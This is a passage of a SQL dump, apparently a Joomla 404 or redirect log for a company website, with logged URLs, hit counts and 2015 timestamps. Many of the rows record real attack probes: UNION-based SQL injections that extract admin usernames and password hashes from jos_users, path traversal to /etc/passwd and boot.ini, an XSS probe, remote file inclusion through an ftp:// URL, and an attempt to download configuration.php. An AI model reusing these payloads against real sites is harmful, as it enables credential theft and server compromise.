00:00:00'),(62,'http://www.fitoman.com/index.php?option=com_content&view=category&layout=blog&id=68&Itemid=148','','','',25,0,'2015-03-12 00:24:51','0000-00-00 00:00:00'),(63,'http://www.fitoman.com/index.php/pages/contact-page','','http://www.fitoman.com/index.php/contacts','',1,0,'2015-03-12 06:20:58','0000-00-00 00:00:00'),(64,'http://www.fitoman.com/index.php/contacts','','http://www.fitoman.com/index.php/contacts','',1,0,'2015-03-12 06:21:56','0000-00-00 00:00:00'),(65,'http://www.fitoman.com/index.php/meet-the-team-2','','http://www.fitoman.com/index.php/contact-page','',1,0,'2015-03-12 10:25:36','0000-00-00 00:00:00'),(66,'http://www.fitoman.com/index.php/partners?view=form','','http://www.fitoman.com/index.php/partners?view=form','',1,0,'2015-03-12 10:43:19','0000-00-00 00:00:00'),(67,'http://www.fitoman.com/index.php?option=com_content&view=article&id=296&Itemid=154','','','',4,0,'2015-03-12 15:24:11','0000-00-00 00:00:00'),(68,'http://fitoman.com/index.php?option=com_sobi2&tmpl=component','','','',1,0,'2015-03-13 20:03:25','0000-00-00 00:00:00'),(69,'http://fitoman.com/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component','','','',3,0,'2015-03-15 05:12:54','0000-00-00 00:00:00'),(70,'http://www.fitoman.com/index.php?Itemid=676','','http://www.fitoman.com/','',1,0,'2015-03-15 05:26:10','0000-00-00 00:00:00'),(71,'http://www.fitoman.com/index.php/pages/about-us-page','','http://www.fitoman.com/index.php/services','',1,0,'2015-03-15 05:47:35','0000-00-00 00:00:00'),(72,'http://www.fitoman.com/Index.php/clients','','http://www.fitoman.com/index.php/services','',27,0,'2015-03-15 05:53:31','0000-00-00 00:00:00'),(73,'http://www.fitoman.com/index.php?option=com_content&view=category&id=61&Itemid=145','','','',29,0,'2015-03-15 22:58:40','0000-00-00 00:00:00'),(74,'http://www.fitoman.com/index.php?option=com_content&view=category&layout=blog&id=61&Itemid=146','','http://www.fitoman.com/index.php','',16,0,'2015-03-16 09:06:04','0000-00-00 00:00:00'),(75,'http://fitoman.com/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1','','','',1,0,'2015-03-16 14:06:10','0000-00-00 00:00:00'),(76,'http://www.fitoman.com/index.php?option=com_content&view=article&id=289&Itemid=149','','','',5,0,'2015-03-17 10:06:13','0000-00-00 00:00:00'),(77,'http://fitoman.com/index.php?option=com_qcontacts&view=category&catid=0','','','',3,0,'2015-03-17 13:45:58','0000-00-00 00:00:00'),(78,'http://www.fitoman.com/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=153','','','',9,0,'2015-03-17 22:39:54','0000-00-00 00:00:00'),(79,'http://www.fitoman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',11,0,'2015-03-18 00:11:10','0000-00-00 00:00:00'),(80,'http://www.fitoman.com/index.php?option=com_myblog&category=aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from jos_users where usertype=\'Super Administrator\' -- \'','','','',2,0,'2015-03-18 15:46:13','0000-00-00 00:00:00'),(81,'http://www.fitoman.com/index.php?option=com_tag&controller=tag&task=add&tmpl=component&article_id=9876543210+union+select+concat_ws(0x3a,username,password,usertype)+from+jos_users+where usertype=0x53757065722041646d696e6973747261746f72','','','',1,0,'2015-03-18 15:47:06','0000-00-00 00:00:00'),(82,'http://www.fitoman.com/index.php?option=com_aist&view=vacancylist&contact_id=1+union+select+1,2,3,4,group_concat(username,0x3a,password,0x3a,usertype),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users-','','','',1,0,'2015-03-18 15:47:06','0000-00-00 00:00:00'),(83,'http://www.fitoman.com/index.php?option=com_content&view=article&id=350&Itemid=144','','','',7,0,'2015-03-19 12:10:18','0000-00-00 00:00:00'),(84,'http://www.fitoman.com/index.php?option=com_simplephotogallery','','','',1,0,'2015-03-21 02:49:28','0000-00-00 00:00:00'),(85,'http://www.fitoman.com/index.php?option=com_content&view=category&id=&Itemid=153','','','',3,0,'2015-03-22 15:15:41','0000-00-00 00:00:00'),(86,'http://fitoman.com/index.php?option=com_content&view=article&id=293:fit-provides-sico-uae-with-brokerage-trading-platform&catid=62:news-a-events&Itemid=153','','','',40,0,'2015-03-23 07:55:15','0000-00-00 00:00:00'),(87,'http://03a1d5b.netsolhost.com/index.php?option=com_content&view=article&id=296&Itemid=154','','','',1,0,'2015-03-23 20:35:33','0000-00-00 00:00:00'),(88,'https://www.fitoman.com/index.php?option=com_content&view=category&id=61&Itemid=145','','','',14,0,'2015-03-23 21:51:52','0000-00-00 00:00:00'),(89,'http://fitoman.com/index.php?option=com_content&view=article&id=290&Itemid=143','','','',37,0,'2015-03-24 01:53:31','0000-00-00 00:00:00'),(90,'http://www.fitoman.com/index.php?option=com_content&view=article&id=293:fit-provides-sico-uae-with-brokerage-trading-platform&catid=62:news-a-events&Itemid=153','','','',3,0,'2015-03-24 08:06:29','0000-00-00 00:00:00'),(91,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=article&id=293:fit-provides-sico-uae-with-brokerage-trading-platform&catid=62:news-a-events&Itemid=153','','','',1,0,'2015-03-24 08:56:10','0000-00-00 00:00:00'),(92,'http://03a1d5b.netsolhost.com/index.php?option=com_content&view=article&id=295:cnbc-arabia-uses-borsat-system&catid=62:news-a-events&Itemid=153','','','',1,0,'2015-03-24 10:08:42','0000-00-00 00:00:00'),(93,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=article&id=294:wed-march-15&catid=62:news-a-events&Itemid=153','','','',1,0,'2015-03-24 10:23:29','0000-00-00 00:00:00'),(94,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=article&id=290&Itemid=143','','','',1,0,'2015-03-24 10:45:47','0000-00-00 00:00:00'),(95,'http://fitoman.com/index.php?option=com_content&view=article&id=296&Itemid=154','','','',17,0,'2015-03-24 19:29:33','0000-00-00 00:00:00'),(96,'http://www.fitoman.com/index.php?option=com_content&view=article&id=290&Itemid=143','','','',4,0,'2015-03-28 22:21:08','0000-00-00 00:00:00'),(97,'http://www.fitoman.com/index.php/features','','','',2,0,'2015-03-29 09:44:50','0000-00-00 00:00:00'),(98,'http://www.fitoman.com/index.php?option=com_content&view=category&id=66&Itemid=155','','','',16,0,'2015-03-30 04:32:15','0000-00-00 00:00:00'),(99,'http://www.fitoman.com/index.php?option=com_content&view=article&id=295:cnbc-arabia-uses-borsat-system&catid=62:news-a-events&Itemid=153','','','',5,0,'2015-04-01 04:12:50','0000-00-00 00:00:00'),(100,'http://fitoman.com/index.php?option=com_community&view=frontpage','','','',5,0,'2015-04-01 05:21:40','0000-00-00 00:00:00'),(101,'http://fitoman.com/index.php?option=com_content&view=category&id=61&Itemid=145','','','',2,0,'2015-04-09 15:14:54','0000-00-00 00:00:00'),(102,'http://fitoman.com/index.php?option=com_content&view=category&id=65&Itemid=144','','','',1,0,'2015-04-09 15:14:57','0000-00-00 00:00:00'),(103,'http://fitoman.com/index.php?option=com_content&view=category&id=66&Itemid=155','','','',1,0,'2015-04-09 15:14:59','0000-00-00 00:00:00'),(104,'http://fitoman.com/index.php?option=com_content&view=category&layout=blog&id=61&Itemid=146','','','',1,0,'2015-04-09 15:15:01','0000-00-00 00:00:00'),(105,'http://fitoman.com/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=153','','','',2,0,'2015-04-09 15:15:03','0000-00-00 00:00:00'),(106,'http://fitoman.com/index.php?option=com_content&view=category&layout=blog&id=68&Itemid=148','','','',4,0,'2015-04-09 15:15:06','0000-00-00 00:00:00'),(107,'http://fitoman.com/index.php/about-us/why-fit','','http://fitoman.com/','',2,0,'2015-04-12 12:14:34','0000-00-00 00:00:00'),(108,'http://fitoman.com/index.php/services/borsat','','http://fitoman.com/index.php/services/wasata','',1,0,'2015-04-12 19:06:09','0000-00-00 00:00:00'),(109,'http://fitoman.com/index.php/services2','','http://fitoman.com/index.php/services/wasata','',1,0,'2015-04-14 06:09:05','0000-00-00 00:00:00'),(110,'http://www.fitoman.com/index.php/services2','','','',2,0,'2015-04-14 08:22:42','0000-00-00 00:00:00'),(111,'http://fitoman.com/index.php/clients','','','',5,0,'2015-04-19 14:27:31','0000-00-00 00:00:00'),(112,'http://fitoman.com/index.php?option=com_content&view=article&id=289&Itemid=149','','','',33,0,'2015-04-23 07:54:59','0000-00-00 00:00:00'),(113,'http://fitoman.com/index.php?option=com_content&view=article&id=294:wed-march-15&catid=62:news-a-events&Itemid=153','','','',5,0,'2015-04-23 07:55:17','0000-00-00 00:00:00'),(114,'http://fitoman.com/index.php?option=com_content&view=article&id=295:cnbc-arabia-uses-borsat-system&catid=62:news-a-events&Itemid=153','','','',24,0,'2015-04-23 07:55:29','0000-00-00 00:00:00'),(115,'http://fitoman.com/index.php?option=com_content&view=article&id=350&Itemid=144','','','',18,0,'2015-04-23 07:55:41','0000-00-00 00:00:00'),(116,'http://fitoman.com/index.php?option=com_content&view=article&id=358&Itemid=158','','','',34,0,'2015-04-23 07:55:43','0000-00-00 00:00:00'),(117,'http://www.fitoman.com/index.php?option=com_content&view=article&id=358&Itemid=158','','','',3,0,'2015-04-23 07:56:27','0000-00-00 00:00:00'),(118,'http://www.fitoman.com/index.php?id=61&Itemid=146&layout=blog&option=com_content&view=category','','','',1,0,'2015-04-26 08:59:19','0000-00-00 00:00:00'),(119,'http://support.fitoman.com/index.php/clients','','','',7,0,'2015-04-26 09:50:50','0000-00-00 00:00:00'),(120,'http://www.fitoman.com/index.php?id=66&Itemid=155&option=com_content&view=category','','','',1,0,'2015-04-26 10:55:42','0000-00-00 00:00:00'),(121,'https://www.fitoman.com/index.php?option=com_content&view=category&layout=blog&id=61&Itemid=146','','','',6,0,'2015-05-03 17:58:49','0000-00-00 00:00:00'),(122,'http://fitoman.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',8,0,'2015-05-08 02:50:44','0000-00-00 00:00:00'),(123,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&id=&Itemid=153','','','',1,0,'2015-05-12 03:58:11','0000-00-00 00:00:00'),(124,'http://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&id=&Itemid=153','','','',1,0,'2015-05-12 04:01:33','0000-00-00 00:00:00'),(125,'https://www.fitoman.com/index.php?option=com_content&view=category&id=&Itemid=153','','','',2,0,'2015-05-12 04:02:42','0000-00-00 00:00:00'),(126,'http://www.fitoman.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1','','','',1,0,'2015-05-12 04:55:10','0000-00-00 00:00:00'),(127,'http://www.fitoman.com/index.php/component/content/article?id=article','','','',332,0,'2015-05-13 02:36:08','0000-00-00 00:00:00'),(128,'http://www.fitoman.com/index.php/component/content/article','','','',37,0,'2015-05-14 22:10:27','0000-00-00 00:00:00'),(129,'http://www.fitoman.com/index.php?Itemid=466','','','',48,0,'2015-05-19 06:39:44','0000-00-00 00:00:00'),(130,'http://www.fitoman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload','','','',5,0,'2015-06-03 06:56:16','0000-00-00 00:00:00'),(131,'http://www.fitoman.com/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',6,0,'2015-06-03 06:56:20','0000-00-00 00:00:00'),(132,'https://www.fitoman.com/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=153','','','',4,0,'2015-06-03 23:27:44','0000-00-00 00:00:00'),(133,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=153','','','',1,0,'2015-06-03 23:32:50','0000-00-00 00:00:00'),(134,'http://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=153','','','',1,0,'2015-06-03 23:37:32','0000-00-00 00:00:00'),(135,'http://www.fitoman.com/index.php/trackback/','','http://www.fitoman.com/index.php?option=com_content&view=article&id=137','',337,0,'2015-06-04 00:02:31','0000-00-00 00:00:00'),(136,'http://www.fitoman.com/index.php/19-sample-data-articles/','','','',6,0,'2015-06-04 03:20:12','0000-00-00 00:00:00'),(137,'http://www.fitoman.com/index.php/index.php?option=com_user&view=register','','','',1,0,'2015-06-06 14:59:29','0000-00-00 00:00:00'),(138,'http://www.fitoman.com/index.php?option=com_user&view=register','','','',85,0,'2015-06-06 14:59:41','0000-00-00 00:00:00'),(139,'https://www.fitoman.com/index.php?option=com_content&view=category&layout=blog&id=68&Itemid=148','','','',4,0,'2015-06-07 22:39:07','0000-00-00 00:00:00'),(140,'https://www.fitoman.com/index.php?option=com_content&view=category&id=66&Itemid=155','','','',4,0,'2015-06-07 22:43:57','0000-00-00 00:00:00'),(141,'https://www.fitoman.com/index.php?option=com_content&view=category&id=65&Itemid=144','','','',2,0,'2015-06-07 23:17:11','0000-00-00 00:00:00'),(142,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&id=65&Itemid=144','','','',1,0,'2015-06-07 23:21:24','0000-00-00 00:00:00'),(143,'http://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&id=65&Itemid=144','','','',1,0,'2015-06-07 23:25:18','0000-00-00 00:00:00'),(144,'http://fitoman.com/index.php?option=com_sobi2&tmpl=component&tag=abc','','','',1,0,'2015-06-10 13:44:53','0000-00-00 00:00:00'),(145,'http://www.fitoman.com/index.php/component/content/article?id=../../../../../../../../../../../../etc/passwd\0','','','',2,0,'2015-06-13 20:34:04','0000-00-00 00:00:00'),(146,'http://www.fitoman.com/index.php/component/content/article?id=../../../../../../../../../../../../etc/passwd','','','',2,0,'2015-06-13 20:34:06','0000-00-00 00:00:00'),(147,'http://www.fitoman.com/index.php/component/content/article?id=../../../../../../../boot.ini\0','','','',2,0,'2015-06-13 20:34:06','0000-00-00 00:00:00'),(148,'http://www.fitoman.com/index.php/component/content/article?id=\"><script>alert(\"m3t4l&master\");</script>','','','',2,0,'2015-06-13 20:34:07','0000-00-00 00:00:00'),(149,'http://www.fitoman.com/index.php?option=../../../../../../../../../../../../../../etc/group','','','',1,0,'2015-07-01 21:55:16','0000-00-00 00:00:00'),(150,'http://www.fitoman.com/index.php?option=../../../../../../../../../../../../../../etc/group\0','','','',1,0,'2015-07-01 21:55:18','0000-00-00 00:00:00'),(151,'http://www.fitoman.com/index.php?option=ftp://temp:25748049@sunmei.com.hk:21/Echo/test.txt','','','',1,0,'2015-07-01 21:55:18','0000-00-00 00:00:00'),(152,'http://www.fitoman.com/index.php?option=ftp://temp:25748049@sunmei.com.hk:21/Echo/test.txt\0','','','',1,0,'2015-07-01 21:55:18','0000-00-00 00:00:00'),(153,'http://www.fitoman.com/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',12,0,'2015-07-08 15:09:45','0000-00-00 00:00:00'),(154,'http://fitoman.com/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',24,0,'2015-07-09 03:34:29','0000-00-00 00:00:00'),(155,'http://www.fitoman.com/index.php/forum/topic/create','','http://www.fitoman.com/','',2,0,'2015-07-10 13:54:12','0000-00-00 00:00:00'),(156,'http://www.fitoman.com/index.php?option=com_easyblog&view=dashboard&layout=write','','http://www.fitoman.com','',35,0,'2015-07-11 15:50:58','0000-00-00 00:00:00'),(157,'http://fitoman.com/index.php?option=com_user&view=register','','http://fitoman.com/index.php?option=com_user&view=register','',23,0,'2015-07-21 07:28:02','0000-00-00 00:00:00'),(158,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&id=66&Itemid=155','','','',1,0,'2015-07-21 13:07:49','0000-00-00 00:00:00'),(159,'http://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&id=66&Itemid=155','','','',1,0,'2015-07-21 13:22:57','0000-00-00 00:00:00'),(160,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&layout=blog&id=68&Itemid=148','','','',1,0,'2015-07-21 13:45:24','0000-00-00 00:00:00'),(161,'http://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&layout=blog&id=68&Itemid=148','','','',1,0,'2015-07-21 13:52:34','0000-00-00 00:00:00'),(162,'https://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&layout=blog&id=61&Itemid=146','','','',2,0,'2015-07-21 23:00:17','0000-00-00 00:00:00'),(163,'http://www.fitoman.com/index.php/contact-page','','','',2,0,'2015-07-22 10:28:25','0000-00-00 00:00:00'),(164,'http://03a1d5b.netsolhost.com/index.php?option=com_content&view=category&layout=blog&id=61&Itemid=146','','','',1,0,'2015-07-23 08:59:20','0000-00-00 00:00:00'),(165,'http://www.fitoman.com/index.php?option=com_kide','','http://www.fitoman.com','',1,0,'2015-07-25 05:27:11','0000-00-00 00:00:00'),(166,'http://fitoman.com/index.php?option=com_myblog&task=ajaxupload','','','',13,0,'2015-07-25 18:53:19','0000-00-00 00:00:00'),(167,'http://www.fitoman.com/index.php?option=com_myblog&task=ajaxupload','','','',9,0,'2015-07-29 03:15:35','0000-00-00 00:00:00'),(168,'http://www.fitoman.com/index.php?option=com_k2&view=item&task=add','','http://www.fitoman.com/index.php?option=com_k2&view=item&task=add','',5,0,'2015-07-29 03:47:36','0000-00-00 00:00:00'),(169,'http://fitoman.com/index.php?option=com_k2&view=item&task=add','','http://fitoman.com/index.php?option=com_k2&view=item&task=add','',1,0,'2015-07-29 03:47:39','0000-00-00 00:00:00'),(170,'http://www.fitoman.com/index.php/component/k2/item/add','','http://www.fitoman.com/index.php/component/k2/item/add','',2,0,'2015-07-29 05:49:20','0000-00-00 00:00:00'),(171,'http://fitoman.com/index.php/component/k2/item/add','','http://fitoman.com/index.php/component/k2/item/add','',1,0,'2015-07-29 05:49:23','0000-00-00 00:00:00'),(172,'http://fitoman.com/index.php/component/content/article?id=article','','','',2,0,'2015-08-05 17:46:34','0000-00-00 00:00:00'),(173,'http://www.fitoman.com/index.php?option=com_k2&view=itemlist','','http://www.fitoman.com/','',3,0,'2015-08-08 09:24:57','0000-00-00 00:00:00'),(174,'http://fitoman.com/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component','','','',1,0,'2015-08-16 14:43:41','0000-00-00 00:00:00'),(175,'http://fitoman.com/index.php/admin/Cms_Wysiwyg/directive/index/','','','',3,0,'2015-08-23 02:39:43','0000-00-00 00:00:00'),(176,'http://www.fitoman.com/index.php?option=com_content\'A=0&view=article&id=124','','','',3,0,'2015-08-26 19:22:14','0000-00-00 00:00:00'),(177,'http://www.fitoman.com/index.php?option=com_contentamp;view=articleamp;id=139','','','',2,0,'2015-09-03 09:51:58','0000-00-00 00:00:00'),(178,'http://www.fitoman.com/index.php?option=com_user&view=reset','','','',1,0,'2015-09-04 12:18:26','0000-00-00 00:00:00'),(179,'http://www.fitoman.com/index.php?option=com_user&view=reset&layout=confirm','','','',1,0,'2015-09-04 12:31:03','0000-00-00 00:00:00'),(180,'http://www.fitoman.com/index.php?option=com_content\'A=0&view=article&id=117','','','',1,0,'2015-09-15 03:38:23','0000-00-00 00:00:00'),(181,'http://www.fitoman.com/index.php?option=com_community&view=register','','http://www.fitoman.com/index.php?option=com_community&view=register','',6,0,'2015-09-17 09:06:58','0000-00-00 00:00:00'),(182,'http://www.fitoman.com/index.php?option=com_registration&task=register','','http://www.fitoman.com/index.php?option=com_registration&task=register','',3,0,'2015-09-17 09:09:06','0000-00-00 00:00:00'),(183,'http://www.fitoman.com/index.php?option=com_fireboard','','http://www.fitoman.com/index.php?option=com_fireboard','',3,0,'2015-09-17 09:09:08','0000-00-00 00:00:00'),(184,'http://www.fitoman.com/index.php/forums/member/register','','http://www.fitoman.com/','',3,0,'2015-09-17 09:11:07','0000-00-00 00:00:00'),(185,'http://fitoman.com/','','http://fitoman.com','',3,0,'2015-09-19 06:52:59','0000-00-00 00:00:00'),(186,'http://fitoman.com/index.php/about-us/xmlrpc.php','','','',4,0,'2015-09-21 22:19:28','0000-00-00 00:00:00'),(187,'http://www.fitoman.com/index.php?option=com_content\'A=0&view=article&id=132','','http://www.fitoman.com/index.php?option=com_content\'A=0&view=article&id=132','',4,0,'2015-09-22 00:45:36','0000-00-00 00:00:00'),(188,'http://fitoman.com/index.php/admin/','','','',4,0,'2015-09-23 04:59:05','0000-00-00 00:00:00'),(189,'http://fitoman.com/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','','','',2,0,'2015-09-29 22:36:54','0000-00-00 00:00:00'),(190,'http://fitoman.com/index.php/using-joomla/extensions/components/users-component/registration-form','','http://fitoman.com/index.php/using-joomla/extensions/components/users-component/registration-form','',2,0,'2015-11-01 11:04:55','0000-00-00 00:00:00'),(191,'http://www.fitoman.com/index.php?option=com_cckjseblod&task=download&file=configuration.php','','','',2,0,'2015-11-08 11:28:25','0000-00-00 00:00:00'),(192,'http://fitoman.com/index.php?option=com_easyblog','','http://fitoman.com/index.php?option=com_easyblog','',2,0,'2015-11-19 17:00:39','0000-00-00 00:00:00'),(193,'http://www.fitoman.com/index.php?option=com_user&task=register','','http://www.fitoman.com/index.php?option=com_user&task=register','',1,0,'2015-11-25 03:48:55','0000-00-00 00:00:00'),(194,'http://www.fitoman.com/index.php?option=com_user&view=user&task=edit','','http://www.fitoman.com/index.php/component/users/?task=user.login','',5,0,'2015-11-28 16:22:32','0000-00-00 00:00:00'),(195,'http://fitoman.com/index.php?option=com_autostand&func=newItem','','http://fitoman.com/index.php?option=com_autostand&func=newItem','',1,0,'2015-11-30 01:24:29','0000-00-00 00:00:00'),(196,'http://fitoman.com/index.php?option=com_kunena&func=userlist&search=%\'+and+1=2)+union+select+1,concat(0x7e,table_name,0x7e),2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453 -- ;','','http://fitoman.com/index.php?option=com_kunena&func=userlist&search=%25\'+and+1=2)+union+select+1,concat(0x7e,table_name,0x7e),2,3,4,5,6,7,8,9,10,11,12','',2,0,'2015-12-01 16:16:05','0000-00-00 00:00:00'),(197,'http://fitoman.com/index.php?option=com_ignitegallery&task=view&gallery=-8+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--&Itemid=6','','http://fitoman.com/index.php?option=com_ignitegallery&task=view&gallery=-8+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10+from+informati','',1,0,'2015-12-01 17:42:58','0000-00-00 00:00:00'),(198,'http://fitoman.com/index.php?view=videos&type=member&user_id=-62+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453','','http://fitoman.com/index.php?view=videos&type=member&user_id=-62+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,','',1,0,'2015-12-02 12:24:00','0000-00-00 00:00:00'),(199,'http://fitoman.com/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,concat(0x7e,table_name,0x7e)+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--','','http://fitoman.com/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,concat(0x7e,table_name,0x7e)+from+inf','',3,0,'2015-12-02 14:25:27','0000-00-00 00:00:00'),(200,'http://fitoman.com/index.php?view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453 --','','http://fitoman.com/index.php?view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,','',1,0,'2015-12-03 16:05:30','0000-00-00 00:00:00'),(201,'http://fitoman.com/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453+--&limitstart=15','','http://fitoman.com/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13+','',3,0,'2015-12-03 19:56:21','0000-00-00 00:00:00'),(202,'http://fitoman.com/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--','','http://fitoman.com/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,','',5,0,'2015-12-03 23:53:26','0000-00-00 00:00:00'),(203,'http://fitoman.com/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+where+table_name=','','http://fitoman.com/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,ta','',1,0,'2015-12-05 11:14:20','0000-00-00 00:00:00'),(204,'http://www.fitoman.com/index.php?option=com_vitabook','','','',8,0,'2015-12-30 18:43:09','0000-00-00 00:00:00'),(205,'http://www.fitoman.com/index.php/component/content/article?id=1332121121121212.1','','','',2,0,'2015-12-31 22:50:50','0000-00-00 00:00:00'),(206,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111 UNION SELECT CHAR(45,120,49,45,81,45) -- /*','','','',1,0,'2015-12-31 23:34:18','0000-00-00 00:00:00'),(207,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /*','','','',1,0,'2015-12-31 23:34:19','0000-00-00 00:00:00'),(208,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /*','','','',1,0,'2015-12-31 23:34:21','0000-00-00 00:00:00'),(209,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /*','','','',1,0,'2015-12-31 23:34:24','0000-00-00 00:00:00'),(210,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /*','','','',1,0,'2015-12-31 23:34:24','0000-00-00 00:00:00'),(211,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /*','','','',1,0,'2015-12-31 23:34:25','0000-00-00 00:00:00'),(212,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,5','','','',1,0,'2015-12-31 23:34:26','0000-00-00 00:00:00'),(213,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \'as /*','','','',1,0,'2015-12-31 23:34:49','0000-00-00 00:00:00'),(214,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \'as /*','','','',1,0,'2015-12-31 23:34:49','0000-00-00 00:00:00'),(215,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \'as /*','','','',1,0,'2015-12-31 23:34:50','0000-00-00 00:00:00'),(216,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \'as /*','','','',1,0,'2015-12-31 23:34:53','0000-00-00 00:00:00'),(217,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \'as /*','','','',1,0,'2015-12-31 23:34:54','0000-00-00 00:00:00'),(218,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order ','','','',1,0,'2015-12-31 23:34:55','0000-00-00 00:00:00'),(219,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\' UNION SELECT 